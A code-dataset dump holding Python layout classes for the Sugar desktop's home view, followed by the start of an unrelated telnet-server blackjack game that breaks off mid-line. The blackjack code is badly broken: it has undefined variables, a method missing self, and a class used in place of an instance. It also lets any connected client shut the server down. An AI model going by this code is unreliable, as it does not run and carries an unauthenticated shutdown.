freeform layout in the pathway view\n palette_name = _('Freeform')\n \"\"\"String used to identify this layout in home view 
dropdown palette.\"\"\"\n\n def __init__(self):\n ActivityLayout.__init__(self)\n\n min_width_, width = self.do_get_width_request()\n min_height_, height = self.do_get_height_request(width)\n \n self._grid = Grid(width / _CELL_SIZE, height / _CELL_SIZE)\n self._grid.connect('child-changed', self.__grid_child_changed_cb)\n\n def __grid_child_changed_cb(self, grid, child):\n child.emit_request_changed()\n\n def append(self, icon, locked=False):\n ActivityLayout.append(self, icon, locked)\n\n min_width_, child_width = icon.get_width_request()\n min_height_, child_height = icon.get_height_request(child_width)\n min_width_, width = self.box.get_width_request()\n min_height_, height = self.box.get_height_request(width)\n\n if icon in self.fixed_positions:\n x, y = self.fixed_positions[icon]\n x = min(x, width - child_width)\n y = min(y, height - child_height)\n elif hasattr(icon, 'get_bundle_id'):\n name_hash = hashlib.md5(icon.get_bundle_id())\n x = int(name_hash.hexdigest()[:5], 16) % (width - child_width)\n y = int(name_hash.hexdigest()[-5:], 16) % (height - child_height)\n else:\n x = None\n y = None\n\n if x is None or y is None:\n self._grid.add(icon,\n child_width / _CELL_SIZE, child_height / _CELL_SIZE)\n else:\n self._grid.add(icon,\n child_width / _CELL_SIZE, child_height / _CELL_SIZE,\n x / _CELL_SIZE, y / _CELL_SIZE)\n\n def remove(self, icon):\n self._grid.remove(icon)\n ActivityLayout.remove(self, icon)\n\n def move_icon(self, icon, x, y, locked=False):\n self._grid.move(icon, x / _CELL_SIZE, y / _CELL_SIZE, locked)\n ActivityLayout.move_icon(self, icon, x, y, locked)\n\n def do_allocate(self, x, y, width, height, req_width, req_height,\n origin_changed):\n for child in self.box.get_layout_children():\n # We need to always get requests to not confuse hippo\n min_w_, child_width = child.get_width_request()\n min_h_, child_height = child.get_height_request(child_width)\n\n rect = self._grid.get_child_rect(child.item)\n child.allocate(rect.x * _CELL_SIZE,\n rect.y * _CELL_SIZE,\n child_width,\n child_height,\n origin_changed)\n\n def allow_dnd(self):\n return True\n\n#_MINIMUM_RADIUS = style.XLARGE_ICON_SIZE / 2 + style.DEFAULT_SPACING + \\\n# style.STANDARD_ICON_SIZE * 2\n#_MAXIMUM_RADIUS = (gtk.gdk.screen_height() - style.GRID_CELL_SIZE) / 2 - \\\n# style.STANDARD_ICON_SIZE - style.DEFAULT_SPACING\n#_ICON_SPACING_FACTORS = [1.5, 1.4, 1.3, 1.2, 1.1, 1.0]\n#_SPIRAL_SPACING_FACTORS = [1.5, 1.5, 1.5, 1.4, 1.3, 1.2]\n#_MIMIMUM_RADIUS_ENCROACHMENT = 0.75\n#_INITIAL_ANGLE = math.pi\n#\n#\n#class RingActivityLayout(ActivityLayout):\n# \"\"\"Lay out icons in a ring or spiral around the XO man.\"\"\"\n#\n# __gtype_name__ = 'RingActivityLayout'\n# icon_name = 'view-radial'\n# \"\"\"Name of icon used in home view dropdown palette.\"\"\"\n# key = 'ring-layout'\n# \"\"\"String used in profile to represent this view.\"\"\"\n# # TRANS: label for the ring layout in the pathway view\n# palette_name = _('Ring')\n# \"\"\"String used to identify this layout in home view dropdown palette.\"\"\"\n#\n# def __init__(self):\n# ActivityLayout.__init__(self)\n# self._locked_children = {}\n# self._spiral_mode = False\n#\n# def append(self, icon, locked=False):\n# ActivityLayout.append(self, icon, locked)\n# if locked:\n# child = self.box.find_box_child(icon)\n# self._locked_children[child] = (0, 0)\n#\n# def remove(self, icon):\n# child = self.box.find_box_child(icon)\n# if child in self._locked_children:\n# del self._locked_children[child]\n# ActivityLayout.remove(self, icon)\n#\n# def move_icon(self, icon, x, 
y, locked=False):\n# ActivityLayout.move_icon(self, icon, x, y, locked)\n# if locked:\n# child = self.box.find_box_child(icon)\n# self._locked_children[child] = (x, y)\n#\n# def _calculate_radius_and_icon_size(self, children_count):\n# \"\"\" Adjust the ring or spiral radius and icon size as needed. \"\"\"\n# self._spiral_mode = False\n# distance = style.MEDIUM_ICON_SIZE + style.DEFAULT_SPACING * \\\n# _ICON_SPACING_FACTORS[_ICON_SIZES.index(style.MEDIUM_ICON_SIZE)]\n# radius = max(children_count * distance / (2 * math.pi), _MINIMUM_RADIUS)\n# if radius < _MAXIMUM_RADIUS:\n# return radius, style.MEDIUM_ICON_SIZE\n#\n# distance = style.STANDARD_ICON_SIZE + style.DEFAULT_SPACING * \\\n# _ICON_SPACING_FACTORS[_ICON_SIZES.index(style.STANDARD_ICON_SIZE)]\n# radius = max(children_count * distance / (2 * math.pi), _MINIMUM_RADIUS)\n# if radius < _MAXIMUM_RADIUS:\n# return radius, style.STANDARD_ICON_SIZE\n#\n# self._spiral_mode = True\n# icon_size = style.STANDARD_ICON_SIZE\n# angle, radius = self._calculate_angle_and_radius(children_count,\n# icon_size)\n# while radius > _MAXIMUM_RADIUS:\n# i = _ICON_SIZES.index(icon_size)\n# if i < len(_ICON_SIZES) - 1:\n# icon_size = _ICON_SIZES[i + 1]\n# angle, radius = self._calculate_angle_and_radius(\n# children_count, icon_size)\n# else:\n# break\n# return radius, icon_size\n#\n# def _calculate_position(self, radius, icon_size, icon_index, children_count,\n# sin=math.sin, cos=math.cos):\n# \"\"\" Calculate an icon position on a circle or a spiral. \"\"\"\n# width, height = self.box.get_allocation()\n# if self._spiral_mode:\n# min_width_, box_width = self.box.get_width_request()\n# min_height_, box_height = self.box.get_height_request(box_width)\n# angle, radius = self._calculate_angle_and_radius(icon_index,\n# icon_size)\n# x, y = self._convert_from_polar_to_cartesian(angle, radius,\n# icon_size,\n# width, height)\n# else:\n# angle = icon_index * (2 * math.pi / children_count) - math.pi / 2\n# x = radius * cos(angle) + (width - icon_size) / 2\n# y = radius * sin(angle) + (height - icon_size - \\\n# (style.GRID_CELL_SIZE / 2)) / 2\n# return x, y\n#\n# def _convert_from_polar_to_cartesian(self, angle, radius, icon_size, width,\n# height):\n# \"\"\" Convert angle, radius to x, y \"\"\"\n# x = int(math.sin(angle) * radius)\n# y = int(math.cos(angle) * radius)\n# x = - x + (width - icon_size) / 2\n# y = y + (height - icon_size - (style.GRID_CELL_SIZE / 2)) / 2\n# return x, y\n#\n# def _calculate_angle_and_radius(self, icon_count, icon_size):\n# \"\"\" Based on icon_count and icon_size, calculate radius and angle. 
\"\"\"\n# spiral_spacing = _SPIRAL_SPACING_FACTORS[_ICON_SIZES.index(icon_size)]\n# icon_spacing = icon_size + style.DEFAULT_SPACING * \\\n# _ICON_SPACING_FACTORS[_ICON_SIZES.index(icon_size)]\n# angle = _INITIAL_ANGLE\n# radius = _MINIMUM_RADIUS - (icon_size * _MIMIMUM_RADIUS_ENCROACHMENT)\n# for i in range(icon_count):\n# circumference = radius * 2 * math.pi\n# n = circumference / icon_spacing\n# angle += (2 * math.pi / n)\n# radius += (float(icon_spacing) * spiral_spacing / n)\n# return angle, radius\n#\n# def _get_children_in_ring(self):\n# children_in_ring = [child for child in self.box.get_layout_children() \\\n# if child not in self._locked_children]\n# return children_in_ring\n#\n# def do_allocate(self, x, y, width, height, req_width, req_height,\n# origin_changed):\n# children_in_ring = self._get_children_in_ring()\n# if children_in_ring:\n# radius, icon_size = \\\n# self._calculate_radius_and_icon_size(len(children_in_ring))\n#\n# for n in range(len(children_in_ring)):\n# child = children_in_ring[n]\n#\n# x, y = self._calculate_position(radius, icon_size, n,\n# len(children_in_ring))\n#\n# # We need to always get requests to not confuse hippo\n# min_w_, child_width = child.get_width_request()\n# min_h_, child_height = child.get_height_request(child_width)\n#\n# child.allocate(int(x), int(y), child_width, child_height,\n# origin_changed)\n# child.item.props.size = icon_size\n#\n# for child in self._locked_children.keys():\n# x, y = self._locked_children[child]\n#\n# # We need to always get requests to not confuse hippo\n# min_w_, child_width = child.get_width_request()\n# min_h_, child_height = child.get_height_request(child_width)\n#\n# if child_width <= 0 or child_height <= 0:\n# return\n#\n# child.allocate(int(x), int(y), child_width, child_height,\n# origin_changed)\n#\n# def compare_activities(self, icon_a, icon_b):\n# if hasattr(icon_a, 'installation_time') and \\\n# hasattr(icon_b, 'installation_time'):\n# return icon_b.installation_time - icon_a.installation_time\n# else:\n# return 0\n#\n#_SUNFLOWER_CONSTANT = style.STANDARD_ICON_SIZE * .75\n#\"\"\"Chose a constant such that STANDARD_ICON_SIZE icons are nicely spaced.\"\"\"\n#\n#_SUNFLOWER_OFFSET = \\\n# math.pow((style.XLARGE_ICON_SIZE / 2 + style.STANDARD_ICON_SIZE) /\n# _SUNFLOWER_CONSTANT, 2)\n#\"\"\"\n#Compute a starting index for the `SunflowerActivityLayout` which leaves space for\n#the XO man in the center. 
Since r = _SUNFLOWER_CONSTANT * sqrt(n),\n#solve for n when r is (XLARGE_ICON_SIZE + STANDARD_ICON_SIZE)/2.\n#\"\"\"\n#\n#_GOLDEN_RATIO = 1.6180339887498949\n#\"\"\"\n#Golden ratio: http://en.wikipedia.org/wiki/Golden_ratio\n#Calculation: (math.sqrt(5) + 1) / 2\n#\"\"\"\n#\n#_SUNFLOWER_ANGLE = 2.3999632297286531\n#\"\"\"\n#The sunflower angle is approximately 137.5 degrees.\n#This is the golden angle: http://en.wikipedia.org/wiki/Golden_angle\n#Calculation: math.radians(360) / ( _GOLDEN_RATIO * _GOLDEN_RATIO )\n#\"\"\"\n#\n#class SunflowerActivityLayout(RingActivityLayout):\n# \"\"\"Spiral layout based on Fibonacci ratio in phyllotaxis.\n#\n# See http://algorithmicbotany.org/papers/abop/abop-ch4.pdf\n# for details of Vogel's model of florets in a sunflower head.\"\"\"\n#\n# __gtype_name__ = 'SunflowerActivityLayout'\n#\n# icon_name = 'view-spiral'\n# \"\"\"Name of icon used in home view dropdown palette.\"\"\"\n#\n# key = 'spiral-layout'\n# \"\"\"String used in profile to represent this view.\"\"\"\n#\n# # TRANS: label for the spiral layout in the pathway view\n# palette_name = _('Spiral')\n# \"\"\"String used to identify this layout in home view dropdown palette.\"\"\"\n#\n# def __init__(self):\n# RingActivityLayout.__init__(self)\n# self.skipped_indices = []\n#\n# def _calculate_radius_and_icon_size(self, children_count):\n# \"\"\"Stub out this method; not used in `SunflowerActivityLayout`.\"\"\"\n# return None, style.STANDARD_ICON_SIZE\n#\n# def adjust_index(self, i):\n# \"\"\"Skip floret indices which end up outside the desired bounding box.\"\"\"\n# for idx in self.skipped_indices:\n# if i < idx:\n# break\n# i += 1\n# return i\n#\n# def _calculate_position(self, radius, icon_size, oindex, children_count,\n# sin=math.sin, cos=math.cos):\n# \"\"\"Calculate the position of sunflower floret number 'oindex'.\n# If the result is outside the bounding box, use the next index which\n# is inside the bounding box.\"\"\"\n#\n# width, height = self.box.get_allocation()\n#\n# while True:\n#\n# index = self.adjust_index(oindex)\n#\n# # tweak phi to get a nice gap lined up where the \"active activity\"\n# # icon is, below the central XO man.\n# phi = index * _SUNFLOWER_ANGLE + math.radians(-130)\n#\n# # we offset index when computing r to make space for the XO man.\n# r = _SUNFLOWER_CONSTANT * math.sqrt(index + _SUNFLOWER_OFFSET)\n#\n# # x,y are the top-left corner of the icon, so remove icon_size\n# # from width/height to compensate. 
y has an extra GRID_CELL_SIZE/2\n# # removed to make room for the \"active activity\" icon.\n# x = r * cos(phi) + (width - icon_size) / 2\n# y = r * sin(phi) + (height - icon_size - \\\n# (style.GRID_CELL_SIZE / 2) ) / 2\n#\n# # skip allocations outside the allocation box.\n# # give up once we can't fit\n# if r < math.hypot(width / 2, height / 2):\n# if y < 0 or y > (height - icon_size) or \\\n# x < 0 or x > (width - icon_size):\n# self.skipped_indices.append(index)\n# continue # try again\n#\n# return x, y\n#\n#class BoxActivityLayout(RingActivityLayout):\n# \"\"\"Lay out icons in a square around the XO man.\"\"\"\n#\n# __gtype_name__ = 'BoxActivityLayout'\n#\n# icon_name = 'view-box'\n# \"\"\"Name of icon used in home view dropdown palette.\"\"\"\n#\n# key = 'box-layout'\n# \"\"\"String used in profile to represent this view.\"\"\"\n#\n# # TRANS: label for the box layout in the pathway view\n# palette_name = _('Box')\n# \"\"\"String used to identify this layout in home view dropdown palette.\"\"\"\n#\n# def __init__(self):\n# RingActivityLayout.__init__(self)\n#\n# def _calculate_position(self, radius, icon_size, index, children_count,\n# sin=None, cos=None):\n#\n# # use \"orthogonal\" versions of cos and sin in order to square the\n# # circle and turn the 'ring view' into a 'box view'\n# def cos_d(d):\n# while d < 0:\n# d += 360\n# if d < 45:\n# return 1\n# if d < 135:\n# return (90 - d) / 45.\n# if d < 225:\n# return -1\n# return cos_d(360 - d) # mirror around 180\n#\n# cos = lambda r: cos_d(math.degrees(r))\n# sin = lambda r: cos_d(math.degrees(r) - 90)\n#\n# return RingActivityLayout._calculate_position\\\n# (self, radius, icon_size, index, children_count,\n# sin=sin, cos=cos)\n#\n#class TriangleActivityLayout(RingActivityLayout):\n# \"\"\"Lay out icons in a triangle around the XO man.\"\"\"\n#\n# __gtype_name__ = 'TriangleActivityLayout'\n#\n# icon_name = 'view-triangle'\n# \"\"\"Name of icon used in home view dropdown palette.\"\"\"\n#\n# key = 'triangle-layout'\n# \"\"\"String used in profile to represent this view.\"\"\"\n#\n# # TRANS: label for the box layout in the pathway view\n# palette_name = _('Triangle')\n# \"\"\"String used to identify this layout in home view dropdown palette.\"\"\"\n#\n# def __init__(self):\n# RingActivityLayout.__init__(self)\n#\n# def _calculate_radius_and_icon_size(self, children_count):\n# # use slightly larger minimum radius than parent, because sides\n# # of triangle come awful close to the center.\n# radius, icon_size = \\\n# RingActivityLayout._calculate_radius_and_icon_size(self, children_count)\n# return max(radius, _MINIMUM_RADIUS + style.MEDIUM_ICON_SIZE), icon_size\n#\n# def _calculate_position(self, radius, icon_size, index, children_count,\n# sin=math.sin, cos=math.cos):\n# # tweak cos and sin in order to make the 'ring' into an equilateral\n# # triangle.\n#\n# def cos_d(d):\n# while d < -90:\n# d += 360\n# if d <= 30:\n# return (d + 90) / 120.\n# if d <= 90:\n# return (90 - d) / 60.\n# return -cos_d(180 - d) # mirror around 90\n#\n# sqrt_3 = math.sqrt(3)\n#\n# def sin_d(d):\n# while d < -90:\n# d += 360\n# if d <= 30:\n# return ((d + 90) / 120.) 
* sqrt_3 - 1\n# if d <= 90:\n# return sqrt_3 - 1\n# return sin_d(180 - d) # mirror around 90\n#\n# cos = lambda r: cos_d(math.degrees(r))\n# sin = lambda r: sin_d(math.degrees(r))\n#\n# return RingActivityLayout._calculate_position\\\n# (self, radius, icon_size, index, children_count,\n# sin=sin, cos=cos)\n","sub_path":"site-packages/glycogen/desktop/activitylayout.py","file_name":"activitylayout.py","file_ext":"py","file_size_in_byte":21395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"631218697","text":"import random\nimport sys\nimport socket\nimport logging\nfrom miniboa import TelnetServer\n\nIDLE_TIMEOUT = 500\nCLIENT_LIST = []\nSERVER_RUN = True\nactiveplayers = []\ndef on_connect(client):\n \"\"\"\n Sample on_connect function.\n Handles new connections.\n \"\"\"\n logging.info(\"Opened connection to {}\".format(client.addrport()))\n broadcast(\"{} is being dealt in.\\n\".format(client.addrport()))\n CLIENT_LIST.append(client)\n client.send(\"Welcome to the Lions Head, {}.\\n\".format(client.addrport()))\n\t\ndef on_disconnect(client):\n \"\"\"\n Sample on_disconnect function.\n Handles lost connections.\n \"\"\"\n logging.info(\"Lost connection to {}\".format(client.addrport()))\n CLIENT_LIST.remove(client)\n broadcast(\"{} Has left the table.\\n\".format(client.addrport()))\n\t\ndef kick_idle():\n \"\"\"\n Looks for idle clients and disconnects them by setting active to False.\n \"\"\"\n # Who hasn't been typing?\n for client in CLIENT_LIST:\n if client.idle() > IDLE_TIMEOUT:\n logging.info(\"Kicking idle lobby client from {}\".format(client.addrport()))\n client.active = False\ndef process_clients():\n \"\"\"\n Check each client, if client.cmd_ready == True then there is a line of\n input available via client.get_command().\n \"\"\"\n for client in CLIENT_LIST:\n if client.active and client.cmd_ready:\n # If the client sends input echo it to the chat room\n chat(client)\n\ndef broadcast(msg):\n \"\"\"\n Send msg to every client.\n \"\"\"\n for client in CLIENT_LIST:\n client.send(msg)\n\ndef chat(client):\n \"\"\"\n Echo whatever client types to everyone.\n \"\"\"\n global SERVER_RUN\n msg = client.get_command()\n logging.info(\"{} says '{}'\".format(client.addrport(), msg))\n\n for guest in CLIENT_LIST:\n if guest != client:\n guest.send(\"{} says '{}'\\n\".format(client.addrport(), msg))\n else:\n guest.send(\"You say '{}'\\n\".format(msg))\n\n cmd = msg.lower()\n\t# Begin Blackjack(AI)\n if cmd == 'run':\n PlayAI(client)\n # bye = disconnect\n elif cmd == 'bye':\n client.active = False\n # shutdown == stop the server\n elif cmd == 'shutdown':\n SERVER_RUN = False\n\ndef PlayAI(client):\n\tactiveplayers.insert(0, 'client.addrport')\n\tactiveplayers[0] = BlackjackGame\n\tgame = activeplayers[0]\n\tgame.run()\n\t\t\t\n\tdef client_print(Message):\n\t\twhile True:\n\t\t\tfor client in CLIENT_LIST:\n\t\t\t\tclient.send(\"{}\".format(Message))\n\t\t\t\treturn\n\n\tdef get_input(question):\n\t\twhile True:\n\t\t\tfor client in CLIENT_LIST:\n\t\t\t\tvalue = client.get_command()\n\t\t\t\tclient.send(\"{} ;response? '{}'\\n\".format(question, value))\n\t\t\tvalue = str(value)\n\t\t\tif value.startswith('y'):\n\t\t\t\treturn 'y'\n\t\t\telif value.startswith('n'):\n\t\t\t\treturn 'n'\n\t\t\telif value.startswith('q'):\n\t\t\t\tsys.exit(0)\n\t\t\telif value.startswith('h'):\n\t\t\t\tclient_print('one day you will have many options to choose from. 
For now you can quit at any time by typing q')\n\t\t\telse:\n\t\t\t\tclient_print('Please choose yes, no, or quit.')\n\n\tdef get_number(question):\n\t\twhile True:\n\t\t\tfor client in CLIENT_LIST:\n\t\t\t\tvalue = client.get_command()\n\t\t\t\tclient.send(\"{} ;response? '{}'\\n\".format(question, value))\n\t\t\tif not value.isdigit():\n\t\t\t\tclient_print('Please type a number')\n\t\t\telif int(value) > game.money:  # hypothetical guard: assumes 'game' is the active BlackjackGame instance, so bets are capped by the player's bankroll\n\t\t\t\tclient_print('Please, kid, you do not have that kind of cash')\n\t\t\telse:\n\t\t\t\treturn int(value)\n\nclass BlackjackGame():\n\t# constants, should be the same for every class\n\tcards = ('A', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K')\n\t#suits = ('♠','♥','♦','♣')\n\tsuits = ('S','H','D','C')\n\t\n\tdef __init__(self):\n\t\tself.deck = []\n\t\tself.money = 500\n\t\tself.cpumoney = 500\n\t\tself.reset_game()\n\t\tGame_Over = False\n\t\n\tdef reset_game(self):\n\t\tself.reset_deck()\n\t\tself.hand = []\n\t\tself.cpuhand = []\n\t\tself.cpufold = False\n\t\tself.cpubet = 0\n\t\tself.cpuraise = 0\n\t\tself.cpumatch = 0\n\t\tself.playerbet = 0\n\t\tself.playerraise = 0\n\t\tself.playerbet2 = 0\n\t\tself.playertotalbet = 0\n\t\tself.pot = 0\n\t\tself.aggrobet = False\n\t\n\tdef reset_deck(self):\n\t\tself.deck.clear()\n\t\tfor s in self.suits:\n\t\t\tfor c in self.cards:\n\t\t\t\tself.deck.append((s, c))\n\t\trandom.shuffle(self.deck)\n\t\t\n\tdef check_hand(self, hand_list):\n\t\tscore = 0\n\t\taces = 0\n\t\tfor c in hand_list:\n\t\t\tif c[1] == 'A':\n\t\t\t\tscore += 1\n\t\t\t\taces += 1\n\t\t\telif c[1] in ('J', 'Q', 'K'):\n\t\t\t\tscore += 10\n\t\t\telse:\n\t\t\t\tscore += int(c[1])\n\t\t\n\t\t# count each ace as 11 while it does not bust the hand\n\t\tfor i in range(aces):\n\t\t\tif score + 10 <= 21:\n\t\t\t\tscore += 10\n\t\t\telse:\n\t\t\t\tbreak\n\t\t\n\t\treturn score\n\n\tdef draw_cards(self, number=1):\n\t\tresult = []\n\t\tfor i in range(number):\n\t\t\tresult.append(self.deck.pop())\n\t\treturn result\n\t\t\n\tdef run():\n\t\tclient_print(\"\"\"Outside the window of the Lion's Head Tavern, the west wind is urging the ocean \\n into an assault on the docks and rattling windows all along the quayside. \n\t\tThe bartender has stopped relocating grime from one glass to another and is instead keeping \\n\t a careful eye on the ceiling, occasionally moving mugs and glasses \\n\t\tto catch the droplets of water leaking from the rafters.\n\t\tThe smell of wet wood and salt has overpowered the lingering aroma of alcohol and \\n the man across from you inhales deeply as he shuffles the tattered deck.\"\"\")\n\t\thasplayed = get_input(\"\"\"\\\"Well now\\\", his rough voice cuts through the soft sigh of water against the cobbles,\\\"is this your first time playing blackjack?\\\": \"\"\")\n\t\tif hasplayed == \"y\":\n\t\t\tshowrules = get_input(\"Do you want me to explain the rules?: \")\n\t\t\tif showrules == \"y\":\n\t\t\t\tclient_print(\"\"\"Blackjack is simple, just try to get as close to 21 without going over. Face cards are ten, aces are one or eleven, your choice. Maybe once you improve we'll introduce splittin' and doubling down.\"\"\")\n\t\t\telse:\n\t\t\t\tclient_print(\"Entirely up to you.  
I don't mind taking your money.\")\n\t\tif hasplayed == \"n\": \n\t\t\tclient_print(\"Well, we'd best get started then, kid.\")\n\t\tself.__init__()\n\t\twhile True: \n\t\t\tself.reset_game()\n\t\t\thand += self.draw_cards(2)\n\t\t\tcpuhand += self.draw_cards(2)\n\t\t\tclient_print(\"Hand: {} (score {})\".format(hand, self.check_hand(hand)) )\n\t\t\tif self.check_hand(cpuhand) == 21:\n\t\t\t\tclient_print(\"I'll wager a little.\")\n\t\t\t\tcpubet = random.randint(5,50)\n\t\t\t\tpot += cpubet\n\t\t\t\tclient_print(cpubet)\n\t\t\telif self.check_hand(cpuhand) < 10:\n\t\t\t\tclient_print(\"I'll see this hand through.\")\n\t\t\t\tcpubet = random.randint(1,20)\n\t\t\t\tpot += cpubet\n\t\t\t\tclient_print(cpubet)\n\t\t\telse:\n\t\t\t\tclient_print(\"I'll bet:\")\n\t\t\t\tcpubet = random.randint(3,30)\n\t\t\t\tpot += cpubet\n\t\t\t\tclient_print(cpubet)\n\t\t\tplayerbet = get_number(\"How much do you wanna lose?: \")\n\t\t\tpot += playerbet\n\t\t\tplayertotalbet = playerbet\n\t\t\thit = get_input(\"Wanna draw another?: \")\n\t\t\tif hit == \"n\":\n\t\t\t\tcpubust = False\n\t\t\t\tif self.check_hand(cpuhand) < 16 :\n\t\t\t\t\tclient_print(\"I'm taking another card\")\n\t\t\t\t\tcpuhand += self.draw_cards()\n\t\t\t\t\tif self.check_hand(cpuhand) > 21:\n\t\t\t\t\t\tclient_print(\"Balls, I'm bust.\")\n\t\t\t\t\t\tcpubust = True\n\t\t\t\t\telif self.check_hand(cpuhand) >= 16:\n\t\t\t\t\t\tclient_print(\"I'll stay. I'm just fine.\")\n\t\t\t\t\telif self.check_hand(cpuhand) < 16 :\n\t\t\t\t\t\tclient_print(\"I'll hit again\")\n\t\t\t\t\t\tcpuhand += self.draw_cards()\n\t\t\t\t\t\tif self.check_hand(cpuhand) > 21:\n\t\t\t\t\t\t\tclient_print(\"Balls, I'm bust.\")\n\t\t\t\t\t\t\tcpubust = True\n\t\t\t\t\t\telif self.check_hand(cpuhand) <= 21 :\n\t\t\t\t\t\t\tclient_print(\"I'll stay. I'm just fine.\")\n\t\t\t\t\t\telif self.check_hand(cpuhand) < 16 :\n\t\t\t\t\t\t\tclient_print(\"I like my luck. I'll take one more.\")\n\t\t\t\t\t\t\tcpuhand += self.draw_cards()\n\t\t\t\t\t\t\tif self.check_hand(cpuhand) > 21:\n\t\t\t\t\t\t\t\tclient_print(\"Balls, I'm bust.\")\n\t\t\t\t\t\t\t\tcpubust = True\n\t\t\t\t\t\t\telif self.check_hand(cpuhand) <= 21: \n\t\t\t\t\t\t\t\tclient_print (\"Well, well. Get ready kid.\")\n\t\t\t\t\t\t\t\taggrobet = True \n\t\t\t\tif cpubust == False:\n\t\t\t\t\tcheckorraise = get_input(\"Think you have a good hand. 
Well, prepared to match my bet?: \")\n\t\t\t\t\tif checkorraise == \"y\":\n\t\t\t\t\t\tcpuraise = random.randint(0,100)\n\t\t\t\t\t\tif aggrobet == True:\n\t\t\t\t\t\t\tcpuraise = cpuraise + 100\n\t\t\t\t\t\tpot = int(pot) + int(cpuraise)\n\t\t\t\t\t\tclient_print(\"I've put in\" )\n\t\t\t\t\t\tclient_print(cpuraise)\n\t\t\t\t\t\tclient_print(\"you're gonna have to match it or raise.\")\n\t\t\t\t\t\tplayerraise = get_number(\"pick a number: \")\n\t\t\t\t\t\tif int(playerraise) < int(cpuraise):\n\t\t\t\t\t\t\tclient_print(\"That ain't enough kid, weren't you listening?\")\n\t\t\t\t\t\t\tclient_print(\"I've put in\" )\n\t\t\t\t\t\t\tclient_print(cpuraise)\n\t\t\t\t\t\t\tclient_print(\"you're gonna have to match it or raise.\")\n\t\t\t\t\t\t\tplayerraise = get_input(\"I'm going to put in: \")\n\t\t\t\t\t\tplayertotalbet = int(playertotalbet) + int(playerraise)\n\t\t\t\t\t\tpot = int(pot) + int(cpuraise) + int(playerraise)\n\t\t\t\t\t\tif int(playerraise) > int(cpuraise):\n\t\t\t\t\t\t\t# pot is an int and cpuhand is a list of cards, so compare the pot directly and score the hand\n\t\t\t\t\t\t\tif pot < 200 and self.check_hand(cpuhand) > 21:\n\t\t\t\t\t\t\t\tclient_print(\"that's a lotta money kid you sure you wanna lose more?\")\n\t\t\t\t\t\t\t\tcpumatch = playerraise\n\t\t\t\t\t\t\t\tpot += int(cpumatch)\n\t\t\t\t\t\t\tif pot < 200 and self.check_hand(cpuhand) < 21:\n\t\t\t\t\t\t\t\tclient_print(\"Too rich for me\")\n\t\t\t\t\t\t\t\tcpufold = True\n\t\t\t\t\t\t\n\t\t\tif hit == \"y\":\n\t\t\t\thand += self.draw_cards()\n\t\t\t\tclient_print(\"Hand: {} (score {})\".format(hand, self.check_hand(hand)) )\n\t\t\t\thit = get_input(\"Careful you don't bust there kid. Sure you wanna draw another?: \")\n\t\t\t\tif hit == \"y\":\n\t\t\t\t\thand += self.draw_cards()\n\t\t\t\t\tclient_print(\"Hand: {} (score {})\".format(hand, self.check_hand(hand)) )\n\t\t\t\t\thit = get_input(\"Going all the way to five cards?: \")\n\t\t\t\tif hit == \"y\":\n\t\t\t\t\thand += self.draw_cards()\n\t\t\t\t\tclient_print(\"Hand: {} (score {})\".format(hand, self.check_hand(hand)) )\n\t\t\t\tif hit in [\"n\", \"y\"]:\n\t\t\t\t\tif self.check_hand(cpuhand) > 19 :\n\t\t\t\t\t\tclient_print(\"I think I'll stay\")\n\t\t\t\t\tif self.check_hand(cpuhand) < 16 :\n\t\t\t\t\t\tclient_print(\"Just one more for me\")\n\t\t\t\t\t\tcpuhand += self.draw_cards()\n\t\t\t\t\tif self.check_hand(cpuhand) > 21 :\n\t\t\t\t\t\tclient_print(\"I'll stay. I'm just fine.\")\n\t\t\t\t\tif self.check_hand(cpuhand) < 16 :\n\t\t\t\t\t\tclient_print(\"I'll test my luck\")\n\t\t\t\t\t\tcpuhand += self.draw_cards()\n\t\t\t\t\t\tif self.check_hand(cpuhand) > 20 :\n\t\t\t\t\t\t\tclient_print(\"I'll stay. I'm just fine.\")\n\t\t\t\t\t\tif self.check_hand(cpuhand) < 16 :\n\t\t\t\t\t\t\tclient_print(\"I like my luck. I'll take one more.\")\n\t\t\t\t\t\t\tcpuhand += self.draw_cards()\n\t\t\t\t\t\t\tif self.check_hand(cpuhand) >= 21: \n\t\t\t\t\t\t\t\tclient_print (\"Well, well. Get ready kid.\")\n\t\t\t\t\t\t\t\taggrobet = True \n\t\t\t\tcheckorraise = get_input(\"Think you have a good hand.  
Well, ready to put money on it?: \")\n\t\t\t\tif checkorraise == \"y\":\n\t\t\t\t\tcpuraise = random.randint(0,50)\n\t\t\t\t\tif aggrobet == True:\n\t\t\t\t\t\tcpuraise = cpuraise + 100\n\t\t\t\t\tpot += int(cpuraise)\n\t\t\t\t\tclient_print(cpuraise)\n\t\t\t\t\tclient_print(\"That's my bet.\")\n\t\t\t\t\tplayerbet2 = get_number(\"I think I'll bet: \")\n\t\t\t\t\tplayertotalbet = int(playertotalbet) + int(playerbet2)\n\t\t\t\t\tpot += int(playerbet2)\n\t\t\t\t\tif int(playerbet2) > int(cpuraise):\n\t\t\t\t\t\tclient_print(\"Bold move Kid.\")\n\t\t\t\t\t\tif self.check_hand(cpuhand) < 19:\n\t\t\t\t\t\t\tclient_print(\"I fold\")\n\t\t\t\t\t\t\tcpufold = True\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tclient_print(\"I'll bite.\")\n\t\t\t\t\t\t\tcpuraise = playerbet2\n\t\t\t\t\t\t\tpot += int(cpuraise)\n\t\t\t\t\t\t\t\n\t\t\tclient_print(\"Time to show our cards\")\n\t\t\tclient_print(\"You've got\")\n\t\t\tclient_print(\"Hand: {} (score {})\".format(hand, self.check_hand(hand)) )\n\t\t\tclient_print(\"Here's my cards\")\n\t\t\tclient_print(\"Hand: {} (score {})\".format(cpuhand, self.check_hand(cpuhand)) )\n\t\t\t\n\t\t\tif self.check_hand(hand) == 21 and len(hand) == 2:\n\t\t\t\tclient_print(\"That's Blackjack. Nice one kid\")\n\t\t\t\t\n\t\t\tif self.check_hand(hand) < self.check_hand(cpuhand):\n\t\t\t\tif cpufold == True:\n\t\t\t\t\tclient_print(\"Damn, should've held out.\")\n\t\t\t\t\tclient_print(pot)\n\t\t\t\t\tmoney -= int(playertotalbet)\n\t\t\t\t\tmoney += int(pot)\n\t\t\t\t\tcpumoney -= int(cpumatch)\n\t\t\t\t\tcpumoney -= int(cpuraise)\n\t\t\t\t\tcpumoney -= int(cpubet)\n\t\t\t\telif self.check_hand(cpuhand) > 21:\n\t\t\t\t\tclient_print(\"I went bust. Take the 